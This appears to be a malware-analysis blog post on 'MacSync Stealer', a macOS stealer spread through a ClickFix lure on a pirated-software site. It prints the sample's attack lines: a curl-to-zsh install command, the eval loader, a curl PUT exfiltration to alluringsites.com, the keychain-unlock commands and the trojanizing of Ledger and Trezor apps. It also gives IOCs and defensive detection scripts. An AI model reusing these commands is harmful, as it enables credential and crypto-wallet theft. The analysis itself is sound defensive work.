Why you shouldn't try to install cracked software by copying and pasting into the terminal
Today we got our hands on a live macOS stealer sample that, while sharing the same ClickFix delivery mechanism used by AMOS campaigns, turns out to be a distinct stealer family with a few capabilities I hadn't seen documented before — most notably, in-place trojanization of Ledger and Trezor wallet apps.
The C2 infrastructure lives at alluringsites.com, a domain that was still fully operational at time of writing. Unlike the AMOS samples we've analyzed before, this one is completely unobfuscated — which makes it easy to read but no less dangerous.
Initial Infection Vector
The sample was found while searching for cracked macOS software — specifically, pirated versions of Parallels Desktop 26. The distributing site is artistapirata.app, which at time of discovery was hosting the malware at:
https://artistapirata.app/parallels-desktop-26-completa-descargar/
This is a textbook SEO-poisoning play: rank a "software crack" page high enough that users searching for pirated Parallels land on it, then deliver a ClickFix payload instead of (or alongside) the promised software. The target demographic — technically comfortable enough to try running a cracked hypervisor, but not security-conscious enough to question a terminal command — is well chosen.
The Redirect Chain
The infection chain involves several intermediary domains. At the bottom of the page, a button labelled "Acceder Al Contenido" triggers a window.open to:
https://jdhost798.it.com/?data=[dynamic_token]&uid=39&sid=28
jdhost798.it.com (Cloudflare-fronted) immediately returns a 302 to the actual ClickFix landing page:
https://info.thedailycrisp.com/?code=[session_code]&uid=39&sid=28
That page — titled "Download for macOS — DMG or via bash" — mimics a legitimate software download portal. It fetches the active payload dynamically from /get_commands.php, which returns a JSON object with OS-specific commands:
```json
{
  "windows": "winget install --id Linear.Linear -e",
  "macos": "curl -kfsSL $(echo 'aHR0cDovL2FsbHVyaW5nc2l0ZXMuY29tL2N1cmwvMjVh...'|base64 -D)|zsh",
  "updated_at": "2026-05-21 09:27:48"
}
```
This API-driven approach lets the operators rotate C2 infrastructure without touching the lure page — swap one URL in the database and every victim clicking the button from that point on gets a different payload. The page even embeds a tutorial video (hosted at files.briefset.com) showing the victim how to open Terminal and paste the command.
The macOS command decodes to:
http://alluringsites.com/curl/25a9dc50d50108ac13f1640103daeb22fc4eed07673a7a9d275f70d83b384b2d
One secondary C2 was found hardcoded in the page's JavaScript as a fallback — thevenueapartments.com — but it was already returning 520 errors at time of analysis, suggesting the infrastructure rotated recently.
The Loader (Stage 1)
The response from the C2 is a short zsh script embedding a gzip-compressed, base64-encoded payload in a heredoc:
```zsh
#!/bin/zsh
d19327=$(base64 -D <<'PAYLOAD_m61122146319169' | gunzip
H4sIAFCxDWoAA91WW2/bNhR+...
PAYLOAD_m61122146319169
)
eval "$d19327"
```
The eval is the only dangerous line. Decompress the payload and you get Stage 2 directly — no additional network request needed for the loader logic itself.
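Both the ClickFix command above and the Stage 1 loader can be unpacked statically, without ever running the eval. The following helper is an added example (not code from the page or the campaign): it pulls the URL out of the echo|base64 substitution returned by /get_commands.php and recovers Stage 2 from the loader's heredoc by base64-decoding and gunzipping it in Python. The sample command and the sample loader are constructed here from the page's own URL and layout; the live lure only shows a truncated base64 prefix, and the heredoc marker is reused from the page.

```python
import base64
import gzip
import re
from typing import Optional

# Constructed sample of the "macos" command shape returned by /get_commands.php.
# The blob is the page's full Stage 1 URL encoded here (the lure shows only a prefix).
STAGE1_URL = ("http://alluringsites.com/curl/"
              "25a9dc50d50108ac13f1640103daeb22fc4eed07673a7a9d275f70d83b384b2d")
SAMPLE_MACOS_CMD = ("curl -kfsSL $(echo '"
                    + base64.b64encode(STAGE1_URL.encode()).decode()
                    + "'|base64 -D)|zsh")

# echo '<b64>' | base64 -D   (macOS spells the flag -D; GNU coreutils uses -d)
ECHO_B64 = re.compile(r"echo\s+'([A-Za-z0-9+/=]+)'\s*\|\s*base64\s+-[dD]")
# base64 -D <<'MARKER' | gunzip  <blob>  MARKER   (the loader's heredoc layout)
HEREDOC = re.compile(
    r"base64\s+-[dD]\s+<<'([^']+)'\s*\|\s*gunzip\s*\n(.*?)\n\1\s*\n", re.S)


def decode_clickfix_url(cmd: str) -> Optional[str]:
    """Return the URL hidden in an echo|base64 command substitution, or None."""
    m = ECHO_B64.search(cmd)
    if not m:
        return None
    return base64.b64decode(m.group(1)).decode("utf-8", "replace")


def unpack_loader(script: str) -> Optional[str]:
    """Recover Stage 2 from the zsh loader without executing its eval."""
    m = HEREDOC.search(script)
    if not m:
        return None
    blob = "".join(m.group(2).split())  # tolerate wrapped base64 lines
    return gzip.decompress(base64.b64decode(blob)).decode("utf-8", "replace")


def build_sample_loader(stage2: str,
                        marker: str = "PAYLOAD_m61122146319169") -> str:
    """Constructed loader in the page's layout; used only as test input here."""
    blob = base64.b64encode(gzip.compress(stage2.encode())).decode()
    return ("#!/bin/zsh\n"
            f"d19327=$(base64 -D <<'{marker}' | gunzip\n"
            f"{blob}\n{marker}\n)\n"
            'eval "$d19327"\n')


if __name__ == "__main__":
    print("Stage 1 URL:", decode_clickfix_url(SAMPLE_MACOS_CMD))
    stage2 = 'daemon_function() { :; }\ndaemon_function "$@" &\n'
    print("Stage 2:\n" + unpack_loader(build_sample_loader(stage2)))
```

Feed unpack_loader the raw text fetched from the C2 (with curl -o, never piped to zsh) and you get the daemon script as plain text; the same regex works on any loader that keeps the base64 -D <<'MARKER' | gunzip shape, even if the variable name and marker are rotated.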
Stage 2: The Daemon
The decoded payload is a daemon_function that does two things:
- Pulls Stage 3 (the actual AppleScript stealer) from the C2 and pipes it to osascript, passing the user's password as a query parameter if already known:
```sh
curl -k -s -H "api-key: 5190ef1733183a0dc63fb623357f56d6" \
  "http://alluringsites.com/dynamic?txd=[token]&pwd=$1" | osascript
```
- Exfiltrates the loot (/tmp/osalogging.zip) back to the C2 in 10MB chunks via PUT requests to /gate:
```sh
dd if=/tmp/osalogging.zip bs=1 skip=$offset count=$chunk_size | \
  curl -X PUT "http://alluringsites.com/gate?buildtxd=[token]&upload_id=..."
```
It retries up to 8 times per chunk with exponential backoff before giving up.
The daemon runs in a background subshell (daemon_function "$@" &), so the parent shell exits immediately.
Stage 3: The AppleScript Stealer
This is where the real action is. The malware self-identifies in its own log file:
MacSync Stealer
Build Tag: nexus
Version: 1.1.2_release (x64_86 & ARM)
No Obfuscation
Unlike AMOS samples that use 400+ variables with arithmetic-decoded strings, this script is entirely plain AppleScript. Every function name, path, and capability is readable in clear text. Whether this is laziness or confidence, it doesn't matter much — the result is the same.
Password Phishing
The first thing the stealer does is kill Terminal (anti-forensics) and then grab the user's password via a fake System Preferences dialog:
```applescript
display dialog "You should update the settings to launch the application." ¬
    default answer "" with icon imagePath ¬
    buttons {"Continue"} default button "Continue" ¬
    giving up after 150 with title "System Preferences" with hidden answer
```
It validates the password using dscl . authonly <user> <pass> and loops indefinitely until it gets a correct one. Once validated, it:
- Unlocks the login keychain:
```sh
security unlock-keychain -p <pass>
```
- Extracts the Chrome Safe Storage key:
```sh
security find-generic-password -wa "Chrome"
```
What It Steals
Browsers — Chromium family (Chrome, Brave, Edge, Vivaldi, Opera, OperaGX, Arc, Yandex, CocCoc, and every Chrome variant) plus Gecko family (Firefox, Zen, LibreWolf, Waterfox). For each profile it grabs Login Data, Cookies, Web Data, and Local Extension Settings.
Browser crypto wallet extensions — A hardcoded list of wallet extension IDs (MetaMask, Phantom, Coinbase Wallet, OKX, and many more) is targeted specifically within the extension settings folders.
Desktop wallets — 21 desktop wallet apps are targeted by path: Exodus, Electrum, Atomic Wallet, Guarda, Coinomi, Sparrow, Wasabi, Bitcoin Core, Armory, Electron Cash, Monero, Litecoin Core, Dash Core, Dogecoin Core, Electrum LTC, BlueWallet, Zengo, Trust Wallet, Ledger Live, Ledger Wallet, Trezor Suite.
Apple Notes — Grabs the full Notes database:
~/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite
~/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite-shm
~/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite-wal
Safari — Cookies.binarycookies, Form Values (autofill), History.db.
File grabber — Desktop, Documents, and Downloads for files with these extensions up to a 10MB total cap: .pdf .docx .doc .wallet .key .keys .db .txt .seed .rtf .kdbx .pem .ovpn
Dotfiles — .zshrc, .zsh_history, .bash_history, .gitconfig — useful for attackers to understand the victim's dev environment and find any hardcoded credentials.
Telegram — Local Telegram data folder.
Keychains — Full keychain dump.
System info — system_profiler output (software, hardware, display data) written to the loot directory.
The Exfil Archive
Everything gets staged to /tmp/sync[random7digits]/ and then compressed with ditto:
```sh
ditto -c -k --sequesterRsrc /tmp/sync1234567/ /tmp/osalogging.zip
```
The lock file /tmp/macsync_[token].lock prevents the stealer from running twice simultaneously.
After collecting everything, the malware shows a decoy error dialog:
System Preferences
"Your Mac does not support this application. Try reinstalling or downloading the version for your system."
[ОК]
Note: that button label uses a Cyrillic "О", not a Latin "O". Small detail, potentially meaningful for attribution.
The Capability That Stands Out: Supply Chain Attack on Hardware Wallets
This is the part we found most interesting. After exfiltrating data, the malware checks whether Ledger Wallet, Ledger Live, or Trezor Suite are installed in /Applications. If any of them are present, it downloads a trojanized version from the C2 and replaces the app's app.asar and Info.plist in-place:
```applescript
set LEDGERURL to "https://alluringsites.com/ledger/live/25a9dc50..."
-- downloads zip, unzips, replaces app contents, re-signs with ad-hoc identity
do shell script "codesign -f -s - " & quoted form of LEDGERDEST
```
The same pattern is applied to Trezor Suite. The app keeps running as normal — from the user's perspective nothing changed. But the next time the victim opens Ledger Live or Trezor Suite, they're running a compromised Electron app that can intercept seed phrases and transaction signing.
This is a significantly higher-impact capability than just stealing existing wallet data. Even if the victim's seed phrase isn't stored anywhere on disk, the trojanized wallet app can capture it the next time they enter it.
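The re-signing step leaves a fingerprint a defender can check for: codesign -f -s - replaces the vendor's Developer ID signature with an ad-hoc one, so codesign -dv --verbose=2 on the bundle reports Signature=adhoc and TeamIdentifier=not set instead of the developer's Team ID. Note that a plain codesign --verify will still pass, because the bundle was re-signed after modification. The checker below is an added example, not the page's or the wallet vendors' code; the two codesign outputs are constructed in the shape codesign prints, the bundle identifier is a made-up com.example.wallet, and the expected Team IDs are placeholders you must replace with values recorded from a known-good install.

```python
import os
import subprocess
from typing import Dict, List

# Placeholders: the real Team IDs of the Ledger and Trezor signing certificates are
# not on the page. Record them from a trusted install before relying on this check.
EXPECTED_TEAM_IDS: Dict[str, str] = {
    "/Applications/Ledger Live.app": "TEAMID_PLACEHOLDER_LEDGER",
    "/Applications/Trezor Suite.app": "TEAMID_PLACEHOLDER_TREZOR",
}

# Constructed output in the shape `codesign -dv --verbose=2` prints for a bundle
# re-signed with `codesign -f -s -` (signing identity "-" means ad-hoc).
SAMPLE_ADHOC = """Executable=/Applications/Ledger Live.app/Contents/MacOS/Ledger Live
Identifier=com.example.wallet
Format=app bundle with Mach-O universal (x86_64 arm64)
CodeDirectory v=20400 size=1234 flags=0x2(adhoc) hashes=30+7 location=embedded
Signature=adhoc
Info.plist entries=30
TeamIdentifier=not set
Sealed Resources version=2 rules=13 files=100
"""

# Constructed output for the same bundle with its Developer ID signature intact.
SAMPLE_DEVID = """Executable=/Applications/Ledger Live.app/Contents/MacOS/Ledger Live
Identifier=com.example.wallet
Signature size=9000
Authority=Developer ID Application: Example Vendor (TEAMID_PLACEHOLDER_LEDGER)
Authority=Developer ID Certification Authority
Authority=Apple Root CA
TeamIdentifier=TEAMID_PLACEHOLDER_LEDGER
"""


def parse_codesign(output: str) -> Dict[str, List[str]]:
    """Turn codesign's key=value lines into a dict; keys such as Authority repeat."""
    fields: Dict[str, List[str]] = {}
    for line in output.splitlines():
        key, sep, value = line.partition("=")
        if sep:
            fields.setdefault(key.strip(), []).append(value.strip())
    return fields


def signature_findings(output: str, expected_team: str) -> List[str]:
    """Return finding tags for one bundle; an empty list means the signature looks intact."""
    f = parse_codesign(output)
    findings: List[str] = []
    if "adhoc" in f.get("Signature", []):
        findings.append("adhoc-signature")
    if f.get("TeamIdentifier", ["not set"])[0] != expected_team:
        findings.append("team-id-mismatch")
    if not any(a.startswith("Developer ID Application") for a in f.get("Authority", [])):
        findings.append("no-developer-id-authority")
    return findings


def check_installed_wallets() -> Dict[str, List[str]]:
    """Run codesign on each wallet app that is present (macOS only)."""
    results: Dict[str, List[str]] = {}
    for app, team in EXPECTED_TEAM_IDS.items():
        if not os.path.isdir(app):
            continue  # not installed, nothing to trojanize
        # codesign prints its -dv report on stderr, not stdout
        proc = subprocess.run(["codesign", "-dv", "--verbose=2", app],
                              capture_output=True, text=True)
        results[app] = signature_findings(proc.stderr + proc.stdout, team)
    return results


if __name__ == "__main__":
    for app, findings in check_installed_wallets().items():
        print(app, "OK" if not findings else "SUSPICIOUS: " + ", ".join(findings))
```

Any non-empty finding list on a wallet app warrants treating the bundle as compromised and reinstalling it from the vendor; the same check generalizes to any Electron app the operators might add to the list later, as long as you know the vendor's Team ID.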
Differences from AMOS
| | AMOS (rvdownloads campaign) | MacSync (alluringsites campaign) |
|---|---|---|
| Obfuscation | Heavy (400+ arithmetic-decoded vars) | None |
| VM detection | Yes (system_profiler + serial numbers) | Not present |
| Password dialog | Fake system update | Fake System Preferences |
| Supply chain attack | No | Yes (Ledger, Trezor) |
| Persistence | LaunchAgent with inline osascript | Not observed |
| Exfil format | tar.gz via curl POST | zip via curl PUT (chunked) |
| C2 auth | None | api-key header |
| Self-identification | No | Yes ("MacSync Stealer / nexus") |
The delivery mechanism (ClickFix, squarespace-family lure domains, curl+base64+zsh) and the data targeting overlap heavily, but the codebase is distinct enough that we'd treat this as a related-but-separate family, or a fork sold/distributed by a different operator.
IOCs
Network
alluringsites.com
info.trendlytalk.com
http://alluringsites.com/curl/25a9dc50d50108ac13f1640103daeb22fc4eed07673a7a9d275f70d83b384b2d
http://alluringsites.com/dynamic?txd=25a9dc50d50108ac13f1640103daeb22fc4eed07673a7a9d275f70d83b384b2d
http://alluringsites.com/gate?buildtxd=25a9dc50...
https://alluringsites.com/ledger/25a9dc50...
https://alluringsites.com/ledger/live/25a9dc50...
https://alluringsites.com/trezor/25a9dc50...
HTTP Header (C2 authentication)
api-key: 5190ef1733183a0dc63fb623357f56d6
Filesystem
/tmp/osalogging.zip
/tmp/sync[0-9]{7}/
/tmp/macsync_25a9dc50...lock
/tmp/25a9dc50...zip (Ledger/Trezor download)
/tmp/app.asar (trojanized electron payload)
Process Patterns
osascript [large script from stdin]
dscl . authonly <user> <pass>
security unlock-keychain -p <pass>
security find-generic-password -wa "Chrome"
ditto -c -k --sequesterRsrc /tmp/sync* /tmp/osalogging.zip
codesign -f -s - /Applications/Ledger*.app
dd if=/tmp/osalogging.zip ... | curl -X PUT .../gate
killall Terminal
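The process patterns above translate almost directly into detection rules. The script below is an added example (not the page's or any product's code) that runs a rule per pattern over process-exec events and then groups hits by parent pid: a single dscl or ditto can be benign, but several of these under one parent (the osascript process, or the zsh daemon that spawned it) is the stealer's shape. The events are constructed JSON lines modelled on the chain described in this post; the pids, the password and the buildtxd token are made up, and the field names (pid, ppid, cmd) are an assumption to adapt to whatever your EDR or ESF feed emits.

```python
import json
import re
from collections import defaultdict
from typing import Dict, List, Set, Tuple

# One rule per process pattern: (tag, regex over the full command line).
RULES: List[Tuple[str, "re.Pattern[str]"]] = [
    ("password_validation_loop", re.compile(r"^dscl\s+\.\s+authonly\b")),
    ("keychain_unlock_with_password", re.compile(r"^security\s+unlock-keychain\s+-p\b")),
    ("chrome_safe_storage_read", re.compile(r'^security\s+find-generic-password\s+-wa\s+"?Chrome')),
    ("loot_archive_staging", re.compile(r"^ditto\s+.*\s/tmp/osalogging\.zip$")),
    ("adhoc_resign_in_applications", re.compile(r"^codesign\s+-f\s+-s\s+-\s+\S*/Applications/")),
    ("loot_archive_chunk_read", re.compile(r"^dd\s+if=/tmp/osalogging\.zip\b")),
    ("chunked_put_exfil", re.compile(r"^curl\s+.*-X\s+PUT\s+.*/gate\b")),
    ("terminal_kill", re.compile(r"^killall\s+Terminal$")),
    ("osascript_from_stdin", re.compile(r"^osascript$")),  # no script path: fed via pipe
]

# Constructed process-exec events (one JSON object per exec). pid 400 stands in for
# the zsh daemon, 502 for the osascript stealer it spawned, 300 for an unrelated shell.
SAMPLE_EVENTS = """\
{"pid": 501, "ppid": 400, "cmd": "killall Terminal"}
{"pid": 502, "ppid": 400, "cmd": "osascript"}
{"pid": 503, "ppid": 502, "cmd": "dscl . authonly alice wrongpass"}
{"pid": 504, "ppid": 502, "cmd": "dscl . authonly alice hunter2"}
{"pid": 505, "ppid": 502, "cmd": "security unlock-keychain -p hunter2"}
{"pid": 506, "ppid": 502, "cmd": "security find-generic-password -wa \\"Chrome\\""}
{"pid": 507, "ppid": 502, "cmd": "ditto -c -k --sequesterRsrc /tmp/sync1234567/ /tmp/osalogging.zip"}
{"pid": 508, "ppid": 502, "cmd": "codesign -f -s - /Applications/Ledger Live.app"}
{"pid": 509, "ppid": 400, "cmd": "dd if=/tmp/osalogging.zip bs=1 skip=0 count=10485760"}
{"pid": 510, "ppid": 400, "cmd": "curl -X PUT http://alluringsites.com/gate?buildtxd=TOKEN_PLACEHOLDER&upload_id=1 --data-binary @-"}
{"pid": 601, "ppid": 300, "cmd": "ls -la /Applications"}
{"pid": 602, "ppid": 300, "cmd": "codesign -dv /Applications/Ledger Live.app"}
"""


def match_rules(cmd: str) -> List[str]:
    """Tags of every rule the command line matches, in RULES order."""
    return [tag for tag, rx in RULES if rx.search(cmd)]


def _events(jsonl: str):
    for line in jsonl.splitlines():
        if line.strip():
            yield json.loads(line)


def scan_events(jsonl: str) -> Dict[int, List[str]]:
    """pid -> matched tags, for processes that matched at least one rule."""
    return {ev["pid"]: tags for ev in _events(jsonl) if (tags := match_rules(ev["cmd"]))}


def hits_by_parent(jsonl: str) -> Dict[int, Set[str]]:
    """Distinct tags grouped under the parent pid that spawned the matching processes."""
    groups: Dict[int, Set[str]] = defaultdict(set)
    for ev in _events(jsonl):
        for tag in match_rules(ev["cmd"]):
            groups[ev["ppid"]].add(tag)
    return dict(groups)


def high_confidence_parents(jsonl: str, min_rules: int = 2) -> Set[int]:
    """Parents with several distinct patterns beneath them; one hit alone may be benign."""
    return {ppid for ppid, tags in hits_by_parent(jsonl).items() if len(tags) >= min_rules}


if __name__ == "__main__":
    for pid, tags in scan_events(SAMPLE_EVENTS).items():
        print(pid, tags)
    print("high-confidence parents:", sorted(high_confidence_parents(SAMPLE_EVENTS)))
```

Two of the rules (dd reading the loot zip and ditto writing it) key on the hardcoded /tmp/osalogging.zip path, which a fork could rename; the dscl . authonly, security unlock-keychain -p and codesign -f -s - patterns key on behaviour rather than strings and are the ones worth keeping even if the path IOCs go stale.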
Conclusion
MacSync Stealer is a capable, unobfuscated macOS stealer delivered through the same ClickFix campaigns that have been distributing AMOS variants. The lack of obfuscation makes it fast to analyze but doesn't limit what it does — the browser credential theft, Notes exfiltration, file grabbing, and keychain dumping are all standard fare.
What sets it apart is the hardware wallet supply chain attack. If you have Ledger or Trezor software installed, this malware doesn't just steal what's already on disk — it compromises the wallet app itself for future exploitation.
alluringsites.com is live at time of writing. Add it to your blocklists.
If you're building macOS defensive tooling, the process indicators are reliable detection signals — particularly the dscl . authonly call, the security unlock-keychain -p pattern, and chunked PUT uploads to non-CDN infrastructure.
Stay safe. 🍎🔒
Authored by Ismael Esquilichi and Pablo Redondo. Full samples available for threat research on request.